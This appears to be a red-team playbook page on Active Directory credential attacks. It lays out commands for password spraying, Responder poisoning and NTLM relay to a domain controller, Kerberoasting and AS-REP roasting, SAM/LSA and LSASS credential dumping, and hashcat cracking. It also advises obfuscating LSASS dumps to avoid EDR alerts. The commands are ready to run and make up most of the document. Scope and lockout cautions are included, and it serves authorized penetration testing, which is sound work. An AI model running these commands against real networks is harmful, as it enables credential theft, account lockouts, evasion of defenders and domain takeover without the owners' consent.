Workflow: Credential Attacks
Obtain/upgrade credential material via spraying, Kerberos roasting, coercion/relay, and hash extraction.
Preconditions
- Recon complete; DC identified
- Password policy known (from
ad_enumeration.mdstep 1) - Authorization explicitly covers spraying and coercion
Safety-critical: lockout policy
Record BEFORE any spray:
LOCKOUT_THRESHOLD(bad-pwd count)LOCKOUT_DURATION(minutes)OBSERVATION_WINDOW(minutes) Cadence:attempts_per_account_per_window < LOCKOUT_THRESHOLD - 1.
A. Password spraying (MUST be sequential with delays)
Spraying is the one credential attack that cannot be parallelized per user. Each account's bad-pwd counter is shared — fan-out will cause lockouts.
# Single-pass with continue-on-success
nxc smb dc.corp.local -u users.txt -p 'Spring2026!' --continue-on-success \
| tee spray.log
# Delayed per-user spray — safer, slower
for u in $(cat users.txt); do
nxc smb dc.corp.local -u "$u" -p 'Spring2026!' --continue-on-success
sleep 2
doneCandidate passwords (seasonal + company + derivatives):
Spring2026!,Summer2026!,<CompanyName>1!,<CompanyName>2026!Welcome1,Password1!,Changeme123!
Kerbrute (pre-auth, much quieter — no SMB logons):
kerbrute passwordspray -d corp.local --dc dc.corp.local users.txt 'Spring2026!'Dry-run first: test with a single non-business-critical account on the list to confirm you can read lockout counters.
B. LLMNR/NBT-NS/mDNS poisoning (parallelizable per interface)
# Edit Responder.conf: SMB = Off, HTTP = Off ONLY if planning NTLM relay
sudo responder -I eth0 -wdF # default poisoning
sudo responder -I eth0 -wdF --wpad # with WPADRelayed authentication (needs Responder's SMB/HTTP disabled):
sudo ntlmrelayx.py -tf smb_no_signing.txt -smb2support -socks
sudo ntlmrelayx.py -t ldaps://dc.corp.local --delegate-access \
--escalate-user FAKE01\$Generate the relay target list first — only hosts without SMB signing required:
nxc smb live.txt --gen-relay-list relay_targets.txtCrack captured NTLMv2:
hashcat -m 5600 captured.ntlmv2 wordlists/rockyou.txt \
-r rules/OneRuleToRuleThemAll.ruleC. Kerberoasting (parallelizable vs. unrelated attacks)
# Request TGS for every SPN user we can see
GetUserSPNs.py "$DOMAIN/$USER:$PASS" -dc-ip "$DC_IP" -request \
-outputfile kerberoast.hash
# Or via NetExec
nxc ldap dc.corp.local -u "$USER" -p "$PASS" --kerberoasting kerberoast.hash
# Crack (13100 = Kerberos 5 TGS-REP etype 23)
hashcat -m 13100 kerberoast.hash wordlists/rockyou.txt \
-r rules/OneRuleToRuleThemAll.ruleTarget selection from BloodHound data: prefer users with pwdlastset > 180 days (likely weak, static passwords).
D. AS-REP Roasting
# No creds needed, just a userlist
GetNPUsers.py "$DOMAIN/" -dc-ip "$DC_IP" -usersfile users.txt \
-format hashcat -outputfile asrep.hash -no-pass
# With creds — targets all DONT_REQ_PREAUTH users
GetNPUsers.py "$DOMAIN/$USER:$PASS" -dc-ip "$DC_IP" -request \
-format hashcat -outputfile asrep.hash
# Crack (18200 = Kerberos 5 AS-REP etype 23)
hashcat -m 18200 asrep.hash wordlists/rockyou.txtE. SAM / LSA extraction (when local admin already obtained)
# Single target
nxc smb target -u admin -p 'pass' --local-auth --sam --lsa
secretsdump.py -sam sam.bak -system system.bak -security security.bak LOCAL
# LSASS dump via lsassy
nxc smb target -u admin -p 'pass' -M lsassyF. Hash cracking strategy
| Hash | Mode | Strategy |
|---|---|---|
| NTLMv2 (Responder) | 5600 | rockyou + OneRuleToRuleThemAll |
| Kerberoast TGS etype 23 | 13100 | rockyou + rules, then mask |
| AS-REP etype 23 | 18200 | rockyou + rules |
| NTLM | 1000 | rockyou + rules + hashcat incremental |
| DCC2 (cached) | 2100 | rockyou (slow — limit to top 10M) |
| DPAPI masterkey | 15300/15900 | only when fast cracking hash is available |
Parallelism summary
| Stream | Parallel? | Notes |
|---|---|---|
| Different users, same password (spraying) | NO | Lockout-shared state |
| Different passwords, one user | Serial w/ gap | Respect observation window |
| Responder + Kerberoast + AS-REP | Yes | Independent primitives |
| Hash cracking across hashlists | Yes | Separate GPUs / hashcat instances |
Safety hints
- Never spray using the "break-glass" admin account on the userlist.
- Keep
spray.log— required for post-engagement lockout reconciliation with the customer. - Relay attacks (ntlmrelayx) can accidentally authenticate to production systems you don't own. Double-check the relay target list is in scope.
- LSASS dumps may trigger EDR alerts; prefer lsassy with obfuscation or dump the process via
comsvcs.dll MiniDumpon the host.
Next workflows
- Obtained local admin hash on a host:
workflows/lateral_movement.md - Obtained service/user with DA path via BH:
workflows/privilege_escalation.md